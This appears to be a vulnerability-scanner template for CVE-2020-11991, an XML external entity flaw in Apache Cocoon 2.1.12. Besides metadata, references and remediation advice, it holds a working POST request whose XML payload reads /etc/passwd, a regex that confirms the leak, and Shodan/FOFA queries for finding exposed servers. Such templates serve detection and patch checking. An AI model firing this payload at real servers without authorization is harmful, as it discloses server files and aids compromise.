Description
Apache Cocoon 2.1.12 contains an XML injection caused by parsing user-provided XML with external system entities in StreamGenerator, letting attackers access arbitrary files on the server, exploit requires sending malicious XML.
Apache Cocoon 2.1.12 contains an XML injection caused by parsing user-provided XML with external system entities in StreamGenerator, letting attackers access arbitrary files on the server, exploit requires sending malicious XML.
id: CVE-2020-11991
info:
name: Apache Cocoon 2.1.12 - XML Injection
author: pikpikcu,diedromeo
severity: high
description: |
Apache Cocoon 2.1.12 contains an XML injection caused by parsing user-provided XML with external system entities in StreamGenerator, letting attackers access arbitrary files on the server, exploit requires sending malicious XML.
impact: |
Attackers can access arbitrary files on the server, leading to information disclosure and potential server compromise.
remediation: |
Update to the latest version of Apache Cocoon or apply security patches that disable external entity processing.
reference:
- https://lists.apache.org/thread/6xg5j4knfczwdhggo3t95owqzol37k1b
- https://nvd.nist.gov/vuln/detail/CVE-2020-11991
- https://lists.apache.org/thread.html/r77add973ea521185e1a90aca00ba9dae7caa8d8b944d92421702bb54%40%3Cusers.cocoon.apache.org%3E
- https://github.com/apache/cocoon/blob/BRANCH_2_1_X/src/webapp/samples/stream/sitemap.xmap
- https://github.com/apache/cocoon/blob/BRANCH_2_1_X/src/java/org/apache/cocoon/generation/StreamGenerator.java
- https://github.com/apache/cocoon/commit/8115f6ce315e306807b224f081fe06a27592c446
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-11991
cwe-id: CWE-611
epss-score: 0.72456
epss-percentile: 0.99428
cpe: cpe:2.3:a:apache:cocoon:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: apache
product: cocoon
shodan-query:
- http.html:"Apache Cocoon"
- http.html:"apache cocoon"
fofa-query: body="apache cocoon"
tags: cve,cve2020,apache,xml,cocoon,xxe,vkev,vuln
http:
- raw:
- |
POST /samples/process-order HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
<?xml version="1.0"?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<userInfo>
<firstName>John</firstName>
<lastName>&ent;</lastName>
</userInfo>
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 490a00463044022032d66ac0984a781b94f52df6d95732533513242cfe87d1fd98ecf6146909ff6202206c8d363c6a20f2ccac1d1bb689552d8e9ce73caad6966b4d7c5e0540a9d9b9d5:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.